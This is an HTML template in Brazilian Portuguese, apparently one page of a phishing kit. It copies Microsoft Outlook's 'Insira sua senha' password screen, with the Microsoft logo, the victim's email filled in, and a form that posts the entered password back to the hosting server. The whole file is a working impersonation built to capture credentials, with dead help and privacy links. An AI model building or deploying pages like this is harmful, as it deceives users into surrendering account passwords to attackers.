<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <title>Insira sua senha</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
  <link rel="stylesheet" href="{{ url_for('static', filename='outlook/outlook_password.css') }}">
  <link rel="icon" type="image/png" href="/static/outlook/favicon.png">
</head>
<body>
    <div class="container">
        <div class="login-box">
            <div class="logo">
                <img src="/static/outlook/microsoft.png" alt="Outlook Logo">
            </div>
            <p class="user-email">{{ email }}</p>
            <h2>Insira sua senha</h2>

            <form method="POST">
                <div class="password-container">
                    <input type="password" id="password" name="password" placeholder="Senha" required>
                    <span class="toggle-password" onclick="togglePassword()">
                        <i class="fa-regular fa-eye" id="eye-icon"></i>
                    </span>
                </div>
                <a href="#" class="link">Esqueceu sua senha?</a>

                <div class="button-wrapper">
                    <button type="submit">Avançar</button>
                </div>
            </form>
            <p class="tip">Use seu rosto, impressão digital, PIN ou chave de segurança</p>
            <p class="alt-option">Entrar com uma conta Microsoft diferente</p>
        </div>
    </div>
    <div class="footer">
        <a href="#">Ajuda</a>
        <a href="#">Termos de uso</a>
        <a href="#">Política de privacidade</a><br>
        <span>Use a navegação privada se esse não for seu dispositivo. <a href="#">Saiba mais</a></span>
    </div>

    <script>
        function togglePassword() {
            const passwordInput = document.getElementById("password");
            const icon = document.getElementById("eye-icon");
            if (passwordInput.type === "password") {
                passwordInput.type = "text";
                icon.classList.remove("fa-eye");
                icon.classList.add("fa-eye-slash");
            } else {
                passwordInput.type = "password";
                icon.classList.remove("fa-eye-slash");
                icon.classList.add("fa-eye");
            }
        }
    </script>
    </body>
</html>
